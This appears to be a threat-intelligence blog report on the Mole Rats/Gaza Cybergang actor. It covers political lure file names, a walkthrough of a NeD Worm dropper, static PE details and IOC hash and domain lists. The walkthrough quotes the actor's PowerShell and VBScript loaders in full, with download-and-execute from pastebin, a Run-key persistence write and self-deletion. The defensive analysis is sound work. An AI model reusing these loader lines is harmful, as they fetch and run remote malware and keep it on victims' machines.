Operation JOKAA(RR)

Operation JOKAA(RR)

Follow Up to Operation Desert Eagle

OSI Actor: Mole Rats / Gaza Cybergang

EXECUTIVE SUMMARY

Operation JOKAA(RR)

Operation JOKAA(RR) looks into the continued activities of the Mole Rats/Gaza Cybergang Threat Actor and their new TTPS. This report builds on their previous activities as found in:

Operation Desert Eagle (Malware_Party)

http://mymalwareparty.blogspot.com/2017/07/operation-desert-eagle.html

Gaza Cybergang (Kaspersky SecureList)

https://securelist.com/gaza-cybergang-updated-2017-activity/82765/

Operation Dusty Sky (ClearSky Security)

https://www.clearskysec.com/dustysky/

Author

• @MalwareParty

Targeting

File Names 

The list of file names (Palestine/Hamas) observed gives us an indication into the targeting/region of this threat actor.

File Name	Translated (Google)
محضر اجتماع الرئيس عباس مع وفد المخابرات المصرية.exe	Minutes of the meeting of President Abbas with the Egyptian intelligence delegation
رد حركة حماس على ورقة المصالحة المصرية.exe	Hamas' response to the Egyptian reconciliation paper
محضر اجتماع اللجنة التنفيذية لمنظمة التحرير الفلسطينية امس الاربعاء.exe	Minutes of the meeting of the Executive Committee of the Palestine Liberation Organization (PLO) on Wednesday
محضر اجتماع على الهاتف بين رئيس المكتب السياسي لحركة حماس اسماعيل هنية ورئيس المخابرات المصرية.exe	Minutes of a meeting on the phone between the head of the political bureau of Hamas Ismail Haniya and the head of Egyptian intelligence
تعميم خاص للسادة السفراء ..exe	Special circular for Ambassadors ..
محضر اجتماع العمادي مع هنية رئيس حماس امس الاحد .exe	Al - Emadi 's meeting minutes with Haniyeh, Hamas' president on Sunday - GameDownload.exe
محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe	Minutes of a secret meeting between President Abbas and Majid Faraj
قرارات الرئيس عباس بخصوص العقوبات المالية في المحافظات الجنوبية.exe	President Abbas' Decisions Regarding Financial Sanctions in the Southern Governorates
سبب الزيارة العاجلة ولقاء مع وفد دحلان.exe	The reason for the urgent visit and meeting with the delegation of Dahlan
N/A	president abbas with Egyption intelligence.exe
ما سيتم بحثه في اجتماع اللجنة التنفيذية الليلة .. وقرارات حاسمة.exe	What will be discussed at the Executive Committee meeting tonight .. Decisive decisions
محضر مغلق حول إجتماع سيادة الرئيس حول التهدئة.exe	Urgent and quick visit to our delegation to Cairo to discuss matters of substance
التسجيل الصوتي الأصلي.scr	The Original Sound Recording

Dynamic Analysis

Sample Run-through

We will take a look at one of the samples listed above and walk through it. This will demonstrate their heavy use of Pastebin in the installation of their NeD Worm malware.

Sample: 

63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0

محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe

Minutes of a secret meeting of President Abbas with Majed Faraj

1. After detonating the sample, there are 2 call outs observed:

A. DNS Requests:  

            

       

B. URL:

hxxps://upload[.]cat/b68f8a8e5810b6b7?download_token=e10ba4c15f…..

        hxxps://dev-point[.]co/uploads1/8f70287802ec1.jpg

2.  The request for upload[.]cat returns 1.jpg (594b6c2826660c44b97e6ef2158f7143d6476f3d7d2a62a787e2b6e6320af413)

3. Once 1.jpg (really an executable) is run, it makes a request to hxxps://pastebin[.]com/raw/hR1iwmqb

A. Contents of hR1iwmqb:

       B. Another request is made for hxxps://pastebin[.]com/raw/4YqrnhP9 which           returns a base64 blob

4. The base64 blob is then added to the end of “TVqQAAMAAAAEA” (for greater obfuscation)

([Convert]::Frombase64String('T'+'V'+'q'+'Q'+'A'+'A'+'M'+'A'+'A'+'A'+'A'+'E'+'A'+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/4YqrnhP9')))

5. Once the Base64 blob is decoded, it becomes an executable file (69fe00eca050b3a8555b30d75eca10697a330fb04021cd36f8d0379ba078f165)

This is the NeD Worm malware that is heavily used by Mole Rats/Gaza Cybergang.

A. Network traffic after running the NeD Worm Sample

B. checktest[.]www1[.]biz Analysis

JOKAA & JOKRR

Taking a closer look at the pastebin users (JOKAA & JOKRR), we can see that the Actor has been active at least from May 17th 2018 - November 11th, 2018.

Looking at JOKRR’s pastebin account we can see the same download/obfuscation technique is being used.

Examining https://pastebin.com/CQuDUFis or “Sen0” we can see the following:

1. Sen0

set Ob123123j0 = CreateObject("Wscr"&"ipt.Shell")

H="Power"&"Shell.exe -windowst"&"yle hidden -noexit [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String('TVqQAAMAAAAEAAAA//8AALg'+(New-Object System.Net.WebClient).Downloadstring('https://pastebin.com/raw/RsGQfwhr'))).EntryPoint.invoke($null,$null)"

Ob123123j0.regwrite "HKCU\"&"Software\M"&"icrosoft\Windows\Curr"&"entVersion\R"&"un\Microt", H, "REG_"&"EXPAND_SZ"

Ob123123j0.Run H,0,false

Ob123123j0.Run "cmd.exe /c del " & ChrW(34) & Wscript.scriptfullname & ChrW(34),0,false

2. Base64 Blob

When combined, the following file is created: cb3f646bf0c6e8d2c57e85ac9f60f974

Static Analysis

63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0

محضر اجتماع سري جمع الرئيس عباس مع ماجد فرج.exe

Minutes of a secret meeting of President Abbas with Majed Faraj

1. File Data:

size: 843264

exif:

PEType: PE32

FileTypeExtension: exe

FileSubtype: 0

FileModifyDate: 2018:11:14 14:09:27-05:00

InitializedDataSize: 199680

FileOS: Win32

FileDescription: 

MIMEType: application/octet-stream

FileVersionNumber: 1.1.26.1

ImageVersion: 0.0

InternalName: 

LinkerVersion: 10.0

EntryPoint: 0x902d3

FileFlagsMask: 0x0017

FileFlags: (none)

FileAccessDate: 2018:11:14 14:09:27-05:00

FileSize: 824 kB

ExifToolVersion: 10.13

TimeStamp: 2017:07:15 21:17:33-04:00

FileInodeChangeDate: 2018:11:14 14:09:27-05:00

CharacterSet: Unicode

FileVersion: 1.1.26.01

ObjectFileType: Executable application

UninitializedDataSize: 0

OSVersion: 5.0

MachineType: Intel 386 or later, and compatibles

ProductVersionNumber: 1.1.26.1

FileType: Win32 EXE

CodeSize: 642560

LegalCopyright: 

SubsystemVersion: 5.0

LanguageCode: English (U.S.)

ProductVersion: 1.1.26.01

Subsystem: Windows GUI

ProductName: 

cert:

source file not signed

peinfo: 

Portable Executable Information

Optional Header: 0x400000

Address Of Entry Point: 0x902d3

Required CPU type: IMAGE_FILE_MACHINE_I386

DLL: False

Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI

Compile Time: 2017-07-15 21:17:33

Number of RVA and Sizes: 16

Number of Sections: 4

Section VirtualAddress VirtualSize SizeofRawData Entropy MD5

.text 0x1000 0x9cdd1 642560 6.62573962703 ed222528c0af141da47ff8a47c345c52

.rdata 0x9e000 0x23276 144384 4.83349152991 25f8d7882fc2a14d37f5ce858ebb9321

.data 0xc2000 0xa0b8 12800 3.9831618653 ace5eafa538405645cda58c972af5d6c

.rsrc 0xcd000 0xa4a8 42496 6.68424524085 795a4831c0ff1ccd453e35c918f82088

Imported DLLS:

WSOCK32.dll 

WINMM.dll 

VERSION.dll 

COMCTL32.dll 

PSAPI.DLL 

KERNEL32.dll 

USER32.dll 

GDI32.dll 

COMDLG32.dll 

ADVAPI32.dll 

SHELL32.dll 

ole32.dll 

OLEAUT32.dll 

import_hash (all of the downloaders have the same import hash): cae167cd04ec2982fcdb300bc5300e29

links:

hxxps://dev-point[.]co/uploads1/8f70287802ec1.jpg,

hxxps://dev-point[.]co/uploads1/bf538abc25841.jpg,

hxxps://upload[.]cat/013c50d8db8f96c8?download_token=6a79073c5fa2d667b93dfc35ffbb3f50633c0a68895fd8abc7b7704e4b7a6ad1,

hxxps://upload[.]cat/2605ee706f79181a?download_token=6bd9689cdcf7409b09321375e240e87eb8a6f9799727334775b12293d2f467b2,

hxxps://upload[.]cat/2b18311779009229?download_token=376be0dbe979e6bc643466d52a60c11efd8e40f46cb5e80226341f840830c291,

hxxps://upload[.]cat/4e9aeb589dbe7fc5?download_token=bd084e7acc93a63f5cf8116209adc5755d383f0a0bbfb93d9eca123f8fae79a7,

hxxps://upload[.]cat/ee9a67e37167755e?download_token=ad5ce7fb9c69f2602ecffcc5932875ea1c07e51ff11172124d9a1bd5c75dfaf8,

IOCs

454413cc1f53e4ffc061d75b291ee95ddf47cbffee362a8a7231a36f0fd58810	SHA-256
cf6da95903b40f5223e8b61b140e8ce5c6531a8d9b6ca8f3a9f3edb76322587c	SHA-256
ba47914665961eacd3bdaefbb7114cd4e079f5fbc4c83fde8d59ffb1de1ef1bb	SHA-256
2e47fa7872181e46439eca4e57f1557c831e4acbd14d0bbc21b0f6e76b4419e6	SHA-256
8eb0798a16796945040ab6445cad5b6293560548fba0824493c31ba5b88fa450	SHA-256
70daf5b93713bc04a8e9308878dd5fee8fccf7b710c1ad5e4c5d54b487843cf9	SHA-256
97b1203e7897ef7a1444525d4d6907cd82bb99affe8b08c1c3129ec1bb90c115	SHA-256
63afb94147b64c3e6e4add33b1153c3662a00ae73a745a975c939107db94fed0	SHA-256
f3c8adb271756db39adfb8cb7bdf75ef362c07b9c0d9404accbba5d9300aa8d0	SHA-256
6bbe0dab409db47e5afd8a3dbe39f8cd549301063ed97fc2bba7c234745d1ebf	SHA-256
222f43744b3bcbd699b00c997c115a421836ac3b4ec7212793d00fd16b7f7009	SHA-256
1c7f02030470fd0f49219e1f8896c8edc91b1c434d088ddf7629d0533491a4b6	SHA-256
cf20acddb6b3611efad03897fd13ed656d7631d2730034013bf2a852a649ef97	SHA-256
d4082fad3e0cd950c688e40f81231697dd1a0431ad53b6f118fe3c4ca3c80dad	SHA-256
6ea639fa3314c81f79ea4d7316eb010eda9dc242a0e8d52f0a03860694274a92	SHA-256
2297a1b3b5a0f2c461814ccd18441f99f78f2b4c35ab63bb58eb293ef9395d18	SHA-256
69fe00eca050b3a8555b30d75eca10697a330fb04021cd36f8d0379ba078f165	SHA-256
3dcf656db1b22efd59255fafbb330379c244fdd1d04d7409b3a3744bcc76685b	SHA-256
13ab2cbb2f3203e61b255627c251c16a0e5fcce84d2fcee7640d50eacfade00c	SHA-256
c44e13c75dff157604934ca4d1e792b4250f7e0e9206f00e7ff367d62763d6aa	SHA-256
d0760f72983b2b6986e1fe925f5cd353ae93d82abba1d4ece5a535916c148e58	SHA-256
checktest.www1[.]biz	Domain
fulltest.yourtrap[.]com	Domain
wiknet.wikaba[.]com	Domain
microsoft10.compress[.]to	Domain
wiknet.moo[.]com	Domain
a.pomf.cat/sytcqv[.]jpg	URL
rgho[.]st/download/7xbxHjQgk/b7dcd79559c772e8b793f612e8aedab6610821ec/b7dcd79559c772e8b793f612e8aedab6610821ec/WpfPuzzle.jpg	URL
dev-point[.]co/uploads1/3cf111f25b271.jpg	URL
dev-point[.]co/uploads1/4ee1d5a5b0e41.jpg	URL
dev-point[.]co/uploads1/630cdefc4bf41.jpg	URL
pastebin.com/raw/Vr83T9s5	URL
upload[.]cat/0037e96c45ac2098?download_token=fa26750b7e73f0081c44831d0aaf9863c75592724dbc2f781ca495f9b5fbd4ac	URL
upload[.]cat/1a215d9da8dd9ad1?download_token=032ffdc5d925e9f206c3dfa29e5252b500a743c1e550e8dcfe66db3d2ea26e26	URL
upload[.]cat/9a08bc13e683d330?download_token=90f1ebb4e1f52835f502bea4307686afc1eb1cdee973cef1fb043febb2a92078	URL